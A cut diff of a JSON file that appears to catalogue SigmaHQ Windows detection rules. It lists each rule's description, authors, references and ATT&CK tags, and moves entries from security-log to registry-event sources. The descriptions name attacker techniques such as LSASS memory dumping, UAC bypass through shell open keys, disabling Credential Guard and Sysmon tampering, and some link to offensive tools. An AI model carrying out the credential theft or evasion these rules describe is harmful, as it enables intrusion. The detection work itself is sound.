"https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", - "value": "Unauthorized System Time Modification" - }, - { - "description": "Detection of logins performed with WMI", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/12/04", - "falsepositive": [ - "Monitoring tools", - "Legitimate system administration" - ], - "filename": "win_security_susp_wmi_login.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" - ], - "tags": [ "attack.execution", - "attack.t1047" + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ] }, - "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", - "value": "Login with WMI" + "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "value": "CMSTP Execution Registry Event" }, { - "description": "Detects remote service activity via remote access to the svcctl named pipe", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", "falsepositive": [ - "Unknown" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], - "filename": "win_security_svcctl_remote_service.yml", + "filename": "registry_event_trust_record_modification.yml", "level": "medium", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" ], "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ] }, - "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "value": "Remote Service Activity via SVCCTL Named Pipe" + "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "value": "Windows Registry Trust Record Modification" }, { - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/12", + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/13", "falsepositive": [ - "Unknown" + "Creation of non-default, legitimate at usage" ], - "filename": "win_security_syskey_registry_access.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_susp_atbroker_change.yml", + "level": "medium", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ - "attack.discovery", - "attack.t1012" + "attack.defense_evasion", + "attack.t1218", + "attack.persistence", + "attack.t1547" ] }, - "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "value": "SysKey Registry Keys Access" + "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "value": "Atbroker Registry Change" }, { - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/07/14", + "creation_date": "2019/08/25", "falsepositive": [ "Unknown" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml", + "filename": "registry_event_disable_wdigest_credential_guard.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/Flangvik/status/1283054508084473861", - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" ], "tags": [ "attack.defense_evasion", "attack.t1112" ] }, - "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "value": "Sysmon Channel Reference Deletion" + "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "value": "Wdigest CredGuard Registry Modification" }, { - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", "meta": { - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate OpenVPN TAP insntallation" - ], - "filename": "win_security_tap_driver_installation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ] - }, - "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", - "value": "Tap Driver Installation - Security" - }, - { - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "meta": { - "author": "@SerkinValery", - "creation_date": "2022/09/16", + "author": "omkar72", + "creation_date": "2020/10/30", "falsepositive": [ "Unknown" ], - "filename": "win_security_teams_suspicious_objectaccess.yml", + "filename": "registry_event_runkey_winekey.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", - "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ] - }, - "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", - "value": "Suspicious Teams Application Related ObjectAcess Event" - }, - { - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" - ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" - ] - }, - "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", - "value": "Transferring Files with Credential Data via Network Shares" - }, - { - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/14", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "win_security_user_added_to_local_administrators.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", - "value": "User Added to Local Administrators" - }, - { - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "meta": { - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ] - }, - "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", - "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" - }, - { - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/04/18", - "falsepositive": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" - ], - "filename": "win_security_user_creation.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" ], "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547" ] }, - "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "value": "Local User Creation" + "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "value": "WINEKEY Registry Modification" }, { - "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", "meta": { - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", - "creation_date": "2019/04/08", - "falsepositive": [ - "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." - ], - "filename": "win_security_user_driver_loaded.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f63508a0-c809-4435-b3be-ed819394d612", - "value": "Suspicious Driver Loaded By User" - }, - { - "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", - "meta": { - "author": "frack113", - "creation_date": "2022/10/14", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", "falsepositive": [ "Unknown" ], - "filename": "win_security_user_logoff.yml", - "level": "informational", - "logsource.category": "No established category", + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" ], - "tags": "No established tags" + "tags": [ + "attack.resource_development", + "attack.t1608" + ] }, - "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", - "value": "User Logoff Event" + "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "value": "HybridConnectionManager Service Installation - Registry" }, { - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/10/20", "falsepositive": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + "Unknown" ], - "filename": "win_security_vssaudit_secevent_source_registration.yml", - "level": "informational", - "logsource.category": "No established category", + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" ], "tags": [ "attack.credential_access", "attack.t1003.002" ] }, - "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", - "value": "VSSAudit Security Event Source Registration" + "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", + "value": "Esentutl Volume Shadow Copy Service Keys" }, { - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "creation_date": "2020/10/12", + "author": "Christian Burkard", + "creation_date": "2021/08/30", "falsepositive": [ "Unknown" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "filename": "registry_event_shell_open_keys_manipulation.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" - }, - { - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "meta": { - "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", - "creation_date": "2017/08/22", - "falsepositive": [ - "Unknown (data set is too small; further testing needed)" - ], - "filename": "win_security_wmi_persistence.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" - ], - "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1548.002", + "attack.t1546.001" ] }, - "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", - "value": "WMI Persistence - Security" + "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "value": "Shell Open Registry Keys Manipulation" }, { - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "description": "Detects FlowCloud malware from threat group TA410.", "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/08/02", + "author": "NVISO", + "creation_date": "2020/06/09", "falsepositive": [ "Unknown" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_mal_flowcloud.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "value": "Microsoft Defender Blocked from Loading Unsigned DLL" - }, - { - "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", - "value": "Unsigned Binary Loaded From Suspicious Location" - }, - { - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." - ], - "filename": "win_hybridconnectionmgr_svc_running.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" ], "tags": [ "attack.persistence", - "attack.t1554" + "attack.t1112" ] }, - "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "value": "HybridConnectionManager Service Running" + "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "value": "FlowCloud Malware" }, { - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/14", + "author": "Florian Roth", + "creation_date": "2021/02/26", "falsepositive": [ - "Packages or applications being legitimately used by users or administrators" + "Unlikely" ], - "filename": "win_shell_core_susp_packages_installed.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_event_silentprocessexit_lsass.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", - "value": "Suspicious Application Installed" - }, - { - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "meta": { - "author": "Florian Roth, KevTheHermit, fuzzyf10w", - "creation_date": "2021/06/30", - "falsepositive": [ - "Account fallback reasons (after failed login with specific account)" - ], - "filename": "win_susp_failed_guest_logon.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/KevTheHermit/status/1410203844064301056", - "https://github.com/hhlxf/PrintNightmare", - "https://github.com/afwu/PrintNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" ], "tags": [ "attack.credential_access", - "attack.t1110.001" + "attack.t1003.001" ] }, - "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", - "value": "Suspicious Rejected SMB Guest Logon From IP" + "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", + "value": "Potential Credential Dumping Via LSASS SilentProcessExit Technique" }, { - "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "meta": { - "author": "Fabian Franz", - "creation_date": "2022/08/30", - "falsepositive": [ - "Legitimate administrative activity", - "Faulty scripts" - ], - "filename": "win_susp_failed_hidden_share_mount.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/moti_b/status/1032645458634653697", - "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" - ], - "tags": [ - "attack.t1021.002", - "attack.lateral_movement" - ] - }, - "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", - "value": "Failed Mounting of Hidden Share" - }, - { - "description": "Detects application popup reporting a failure of the Sysmon service", - "meta": { - "author": "Tim Shelton", - "creation_date": "2022/04/26", + "author": "frack113", + "creation_date": "2022/12/11", "falsepositive": [ "Unknown" ], - "filename": "win_system_application_sysmon_crash.yml", + "filename": "registry_set_legalnotice_susp_message.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_set_legalnotice_susp_message.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.impact", + "attack.t1491.001" ] }, - "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "value": "Sysmon Crash" - }, - { - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/31", - "falsepositive": [ - "Unknown" - ], - "filename": "win_system_apt_carbonpaper_turla.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" - ] - }, - "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "value": "Turla Service Install" + "uuid": "8b9606c9-28be-4a38-b146-0e313cc232c1", + "value": "Potential Ransomware Activity Using LegalNotice Message" }, { "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", @@ -18628,13 +11747,13 @@ "falsepositive": [ "Unknown" ], - "filename": "win_system_apt_chafer_mar18_system.yml", + "filename": "registry_event_apt_chafer_mar18.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" ], "tags": [ "attack.persistence", @@ -18648,1656 +11767,2194 @@ "attack.t1071.004" ] }, - "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", - "value": "Chafer Activity - System" + "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "value": "Chafer Activity - Registry" }, { - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "description": "Detects Pandemic Windows Implant", "meta": { "author": "Florian Roth", - "creation_date": "2017/03/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_system_apt_stonedrill.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" - ] - }, - "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "value": "StoneDrill Service Install" - }, - { - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/11/23", - "falsepositive": [ - "Unlikely" - ], - "filename": "win_system_apt_turla_service_png.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" - ] - }, - "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "value": "Turla PNG Dropper Service" - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "meta": { - "author": "Florian Roth, Wojciech Lesicki", - "creation_date": "2021/05/26", + "creation_date": "2017/06/01", "falsepositive": [ "Unknown" ], - "filename": "win_system_cobaltstrike_service_installs.yml", + "filename": "registry_event_apt_pandemic.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" ], "tags": [ - "attack.execution", - "attack.privilege_escalation", "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1105" ] }, - "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", - "value": "CobaltStrike Service Installations - System" + "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "value": "Pandemic Registry Key" }, { - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", "meta": { - "author": "Ján 